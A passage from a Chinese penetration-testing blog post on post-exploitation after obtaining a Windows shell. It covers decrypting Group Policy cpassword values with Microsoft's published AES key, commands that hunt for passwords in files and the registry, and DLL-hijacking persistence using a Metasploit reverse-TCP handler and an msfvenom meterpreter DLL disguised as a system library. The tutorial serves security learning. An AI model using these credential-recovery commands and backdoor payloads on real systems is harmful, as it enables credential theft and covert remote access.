  &lt;Properties action=&quot;U&quot; newName=&quot;&quot; fullName=&quot;&quot; description=&quot;&quot; cpassword=&quot;9XLcz+Caj/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U&quot; changeLogon=&quot;0&quot; noChange=&quot;0&quot; neverExpires=&quot;0&quot; acctDisabled=&quot;0&quot; subAuthority=&quot;RID_ADMIN&quot; userName=&quot;Administrator (内置)&quot; /&gt; 
  &lt;/User&gt;
  &lt;/Groups&gt;
</code></pre>
<p><strong>值得注意的是其中的cpassword项，保存的是加密后的内容”9XLcz+Caj&#x2F;kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U”<br>加密方式为AES 256，虽然目前AES 256很难被攻破，但是微软选择公开了该AES 256加密的私钥，地址如下：</strong></p>
<p><a target="_blank" rel="noopener" href="https://msdn.microsoft.com/en-us/library/cc422924.aspx">https://msdn.microsoft.com/en-us/library/cc422924.aspx</a></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP7.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>我们可以借助下面这个项目将明文密码还原</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1">https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1</a></p>
<p>该脚本可在域内主机上执行，能够自动查询共享文件夹\SYSVOL中的文件，还原出所有明文密码</p>
<p><strong>测试如下图</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP8.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>当然，仅仅为了解密cpassword&#x3D;”9XLcz+Caj&#x2F;kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U”，我们可以对以上powershell脚本的功能简化</p>
<p><strong>简化代码如下：</strong></p>
<pre><code class="hljs">function Get-DecryptedCpassword &#123;
    [CmdletBinding()]
    Param (
        [string] $Cpassword
    )
 
    try &#123;
        #Append appropriate padding based on string length  
        $Mod = ($Cpassword.length % 4)
 
        switch ($Mod) &#123;
        &#39;1&#39; &#123;$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)&#125;
        &#39;2&#39; &#123;$Cpassword += (&#39;=&#39; * (4 - $Mod))&#125;
        &#39;3&#39; &#123;$Cpassword += (&#39;=&#39; * (4 - $Mod))&#125;
        &#125;
 
        $Base64Decoded = [Convert]::FromBase64String($Cpassword)
 
        #Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
 
        #Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length) 
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor() 
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
 
        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    &#125;
 
    catch &#123;Write-Error $Error[0]&#125;
&#125;
Get-DecryptedCpassword &quot;9XLcz+Caj/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U&quot;
</code></pre>
<blockquote>
<p>也就是说：域管理员在使用组策略批量管理域内主机时，如果配置组策略的过程中需要填入密码，那么该密码会被保存到共享文件夹\SYSVOL下，默认所有域内用户可访问，虽然被加密，但很容易被解密</p>
</blockquote>
<p>为此，微软发布了补丁KB2962486，下载地址：</p>
<p><a target="_blank" rel="noopener" href="https://technet.microsoft.com/library/security/ms14-025">https://technet.microsoft.com/library/security/ms14-025</a></p>
<p>系统打了补丁后，组策略中无法设置用户名密码，如下图</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP9.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>除了 Groups.xml 以外，其他几个策略首选项文件也可能存在 “cPassword” 属性</p>
<pre><code class="hljs">Services\Services.xml

http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)
ScheduledTasks\ScheduledTasks.xml

http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)
Printers\Printers.xml

http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)
Drives\Drives.xml

http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)
DataSources\DataSources.xml

http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
</code></pre>
<h2 id="0X04-辅助的命令"><a href="#0X04-辅助的命令" class="headerlink" title="0X04 辅助的命令"></a><strong>0X04 辅助的命令</strong></h2><h3 id="1-下面的命令将在文件系统中搜索包含特定关键字的文件名-可以指定任意多的关键字。"><a href="#1-下面的命令将在文件系统中搜索包含特定关键字的文件名-可以指定任意多的关键字。" class="headerlink" title="1.下面的命令将在文件系统中搜索包含特定关键字的文件名,可以指定任意多的关键字。"></a><strong>1.下面的命令将在文件系统中搜索包含特定关键字的文件名,可以指定任意多的关键字。</strong></h3><pre><code class="hljs">C:\Windows\system32&gt; dir /s *pass* == *cred* == *vnc* == *.config*
</code></pre>
<h3 id="2-搜索某些文件类型的关键字"><a href="#2-搜索某些文件类型的关键字" class="headerlink" title="2.搜索某些文件类型的关键字"></a><strong>2.搜索某些文件类型的关键字</strong></h3><pre><code class="hljs">C:\Windows\system32&gt; findstr /si password *.xml *.ini *.txt
</code></pre>
<h3 id="3-下面的两个命令可以用于grep注册表中的关键字，在本例中是“password”。"><a href="#3-下面的两个命令可以用于grep注册表中的关键字，在本例中是“password”。" class="headerlink" title="3.下面的两个命令可以用于grep注册表中的关键字，在本例中是“password”。"></a><strong>3.下面的两个命令可以用于grep注册表中的关键字，在本例中是“password”。</strong></h3><pre><code class="hljs">C:\Windows\system32&gt; reg query HKLM /f password /t REG_SZ /s

C:\Windows\system32&gt; reg query HKCU /f password /t REG_SZ /s
</code></pre>
<h2 id="0X05-辅助的工具"><a href="#0X05-辅助的工具" class="headerlink" title="0X05 辅助的工具"></a><strong>0X05 辅助的工具</strong></h2><h3 id="accesschk-exe-来批量检查权限信息"><a href="#accesschk-exe-来批量检查权限信息" class="headerlink" title="accesschk.exe 来批量检查权限信息"></a><strong>accesschk.exe 来批量检查权限信息</strong></h3><p>这个工具来源于工具集 Sysinternals Suite ，感兴趣的可以在<a target="_blank" rel="noopener" href="https://download.sysinternals.com/files/SysinternalsSuite.zips://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP9.png">这里</a>下载。该工具的主要作用就是判断用户对于指定文件或者目录下面的所有文件的读写权限（R 是读，W 是写）</p>
<h4 id="1-查看-d-test-目录下所有文件对每个用户组的权限情况"><a href="#1-查看-d-test-目录下所有文件对每个用户组的权限情况" class="headerlink" title="1.查看 d:&#x2F;test 目录下所有文件对每个用户组的权限情况"></a><strong>1.查看 d:&#x2F;test 目录下所有文件对每个用户组的权限情况</strong></h4><p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP10.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h4 id="2-查看指定用户组对文件夹下文件的权限"><a href="#2-查看指定用户组对文件夹下文件的权限" class="headerlink" title="2.查看指定用户组对文件夹下文件的权限"></a><strong>2.查看指定用户组对文件夹下文件的权限</strong></h4><p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP11.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h4 id="3-查看某个用户组对指定服务的权限"><a href="#3-查看某个用户组对指定服务的权限" class="headerlink" title="3.查看某个用户组对指定服务的权限"></a><strong>3.查看某个用户组对指定服务的权限</strong></h4><p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP12.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h4 id="4-查看对某个用户组有写权限的所有服务"><a href="#4-查看对某个用户组有写权限的所有服务" class="headerlink" title="4.查看对某个用户组有写权限的所有服务"></a><strong>4.查看对某个用户组有写权限的所有服务</strong></h4><p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP13.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h4 id="5-查看某个用户或用户组对某个注册表项的权限"><a href="#5-查看某个用户或用户组对某个注册表项的权限" class="headerlink" title="5.查看某个用户或用户组对某个注册表项的权限"></a><strong>5.查看某个用户或用户组对某个注册表项的权限</strong></h4><p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP14.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>这里 hklm 是 HKEY_LOCAL_MACHINE 的缩写，HKEY_CLASSES_ROOT 的缩写是 hkcr </p>
<h2 id="0X06-权限维持"><a href="#0X06-权限维持" class="headerlink" title="0X06 权限维持"></a><strong>0X06 权限维持</strong></h2><p>后门是权限维持的必要手段，那么怎么才能安放一个好的后门就非常有技巧，之前我在前面文章中讲过影子账户的创建，感兴趣的同学可以移步 <a target="_blank" rel="noopener" href="http://www.k0rz3n.com/2018/06/26/windows%E6%B8%97%E9%80%8F%E4%B8%AD%E5%90%8E%E9%97%A8%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%96%B9%E6%B3%95%E6%8E%A2%E7%A9%B6/">这里</a></p>
<p>当然还有一种更加复杂并且隐蔽的方法：DLL 劫持，这个方法不仅仅在创建后门的时候被经常用到，在 Bypass UAC 的时候也是一种核心的手段</p>
<h3 id="1-简单的介绍一下"><a href="#1-简单的介绍一下" class="headerlink" title="1.简单的介绍一下"></a><strong>1.简单的介绍一下</strong></h3><p>我们知道，程序在编译的时候往往为了节约空间不会将运行时用到的所有的库都静态编译进 exe 文件中，这样就意味着我们在运行程序的时候程序会去系统中加载需要的动态链接库，这就是我们所说的 DLL (Linux 下的动态链接库是 .so 文件，windows 下是 .dll)。</p>
<p>系统会有一个寻找 dll 文件的默认顺序，当将恶意的 DLL 文件放到其中一个路径下，并保证该恶意 DLL 先于合法的 DLL 被程序找到时就会发生 DLL 劫持；也可能是程序寻找的 DLL 文件名在系统中并不存在，这时我们只需将自己定制的 DLL 文件放到程序的搜索路径也可以达到目的。</p>
<p>下面你可以看到在一个 32 位系统中 DLL 的搜索顺序：</p>
<pre><code class="hljs">1 - 应用加载的目录

2 - 32-bit 系统目录(C:\Windows\System32)

3 - 16-bit 系统目录 (C:\Windows\System)

4 - Windows 目录(C:\Windows)

5 - 当前工作目录 (CWD)

6 - 环境变量中的目录 (system then user)
</code></pre>
<p>通过上面的搜索路径可以看到第六点环境变量，这也是我们比较容易控制的路径，如果目标装有 python，那么 Path &#x3D; C:\Python27 就是我们可以控制的路径，我们只需要将恶意定制的 DLL 文件放到这个目录就可以。</p>
<h3 id="2-利用步骤"><a href="#2-利用步骤" class="headerlink" title="2.利用步骤"></a><strong>2.利用步骤</strong></h3><h4 id="1-首先在我的公网-vps-开启-msf-建立监听"><a href="#1-首先在我的公网-vps-开启-msf-建立监听" class="headerlink" title="1.首先在我的公网 vps 开启 msf 建立监听"></a><strong>1.首先在我的公网 vps 开启 msf 建立监听</strong></h4><pre><code class="hljs">msf5 &gt; use exploit/multi/handler
msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp
payload =&gt; windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) &gt; set lhost xxx.xxx.xxx.xxx
lhost =&gt; xxx.xxx.xxx.xxx
msf5 exploit(multi/handler) &gt; set lport 9999
lport =&gt; 9999
msf5 exploit(multi/handler) &gt; exploit

[*] Started reverse TCP handler on xxx.xxx.xxx.xxx:9999 
</code></pre>
<h4 id="2-利用-DllHijackAuditor-工具进行-dll-劫持检测"><a href="#2-利用-DllHijackAuditor-工具进行-dll-劫持检测" class="headerlink" title="2.利用 DllHijackAuditor 工具进行 dll 劫持检测"></a><strong>2.利用 DllHijackAuditor 工具进行 dll 劫持检测</strong></h4><p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP16.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h4 id="3-在本地的-msf-上生成需要利用的-payload"><a href="#3-在本地的-msf-上生成需要利用的-payload" class="headerlink" title="3.在本地的 msf 上生成需要利用的 payload"></a><strong>3.在本地的 msf 上生成需要利用的 payload</strong></h4><pre><code class="hljs">msf &gt; msfvenom -p windows/meterpreter/reverse_tcp l_host=xxx.xxx.xxx.xxx lport=9999 -f dll -o /root/ext-ms-win-kernel32-package-current-l1-1-0
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp l_host=xxx.xxx.xxx.xxx lport=9999 -f dll -o /root/ext-ms-win-kernel32-package-current-l1-1-0

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of dll file: 5120 bytes
Saved as: /root/ext-ms-win-kernel32-package-current-l1-1-0
</code></pre>
<p><strong>然后我将其放在软件相同的目录下，如下图：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP15.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h4 id="4-运行后获取-meterpreter-的shell"><a href="#4-运行后获取-meterpreter-的shell" class="headerlink" title="4.运行后获取 meterpreter 的shell"></a><strong>4.运行后获取 meterpreter 的shell</strong></h4><p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/GPP17.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/JeYxI2usvJCwmijYEefmOw">https://mp.weixin.qq.com/s/JeYxI2usvJCwmijYEefmOw</a>?<br><a target="_blank" rel="noopener" href="http://www.fuzzysecurity.com/tutorials/16.html">http://www.fuzzysecurity.com/tutorials/16.html</a><br><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/92016.html">https://www.freebuf.com/vuls/92016.html</a><br><a target="_blank" rel="noopener" href="https://www.xuebuyuan.com/2082105.html">https://www.xuebuyuan.com/2082105.html</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/Fly_hps/article/details/80641585">https://blog.csdn.net/Fly_hps/article/details/80641585</a><br><a target="_blank" rel="noopener" href="http://blog.51cto.com/rangercyh/497497">http://blog.51cto.com/rangercyh/497497</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="category-chain-item">渗透测试</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E6%8A%80%E5%B7%A7/" class="print-no-link">#渗透测试 技巧</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>拿到一个普通的 Windows Shell 以后能做什么</div>
      <div>http://k0rz3n.com/2019/01/27/拿到一个普通的 Windows Shell 以后能做什么/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>K0rz3n</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>January 27, 2019</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - Non-commercial">
                    <i class="iconfont icon-cc-nc"></i>
                  </span>
                </a>
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - Share-alike">
                    <i class="iconfont icon-cc-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2019/01/28/%E5%AF%B9%20SSL%20%E6%8A%80%E6%9C%AF%E7%9A%84%E8%AF%A6%E7%BB%86%E5%BD%92%E7%BA%B3/" title="对 SSL 技术的详细归纳">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">对 SSL 技术的详细归纳</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2019/01/27/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%B0%8F%E6%8A%80%E5%B7%A7%E4%B8%80%EF%BC%9A%E5%AF%BB%E6%89%BEEXP/" title="渗透测试小技巧一：寻找EXP">
                        <span class="hidden-mobile">渗透测试小技巧一：寻找EXP</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
